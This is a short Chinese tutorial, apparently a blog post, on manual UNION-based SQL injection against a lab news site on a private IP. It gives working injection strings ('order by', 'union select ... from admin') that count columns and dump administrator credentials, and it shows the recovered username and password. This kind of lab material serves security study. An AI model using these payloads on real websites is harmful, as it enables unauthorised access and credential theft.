SQL注入原理-手工联合查询注入技术

【实验原理】首先,在链接后面添加语句

【order by 11(数字任意)】,

根据页面返回结果,来判断站点中的字段数目。然后,在链接后面添加语句

【union select 1,2,3,4,5,6,7,8,9,10,11 from admin(表名)】,

进行联合查询,来暴露可查询的字段编号。

最后,根据上一步得到的字段编号,添加语句

【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】,

直接暴露管理员用户名和密码。



就以新闻雷池作为例子


随便点击一个链接【http://192.168.1.3:8008/onews.asp?id=45】,在后面添加语句【order by 11】,页面显示正常。


同样添加语句【order by 12】页面报错,所以此站字段长度为11


在连接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin】,页面显示数字2和3


在连接后面添加语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】,即可暴出管理员用户名和密码。

管理员用户名【admin】和密码【bfpms】
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容